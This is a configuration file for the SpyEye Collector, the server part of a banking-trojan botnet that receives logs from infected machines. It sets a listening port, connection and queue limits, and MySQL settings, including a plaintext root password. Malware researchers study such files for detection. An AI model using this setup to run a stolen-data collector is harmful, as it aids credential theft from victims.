################################################################################
# [SpyEye Collector v0.3.9] configuration file.
#

listening port for logs         = "433"
listening IP-addr for logs      = "0.0.0.0" 

max established connections     = "200"
# Limit of 5 connections enough for handle 1'000 logs in one minute.

max unprocessed logs queue size = "111000"
# Each log allocate minimum 4 KBytes of memory,
# so if you have 100 MBytes of free memory you can
# store about 100*1024/4 = 102400/4 = 25600 logs (in fact number little less).
# This can be used when MySQL server has down and can't process requests.
# When MySQL get up all logs will be inserted into DB.
# If you reach this limit, collector will stop accept new connections. 

mysql db name     = "fr"
mysql host        = "127.0.0.1"
# port = 0 -- is told to MySQL that we want to connect under unix socket.
# By several test we can say that this up perfomance by 10~40%.
# mysql port        = "0"
mysql port        = "3306"
mysql unix socket = ""
mysql username    = "root"
mysql password    = "ser42459"

### End of config.

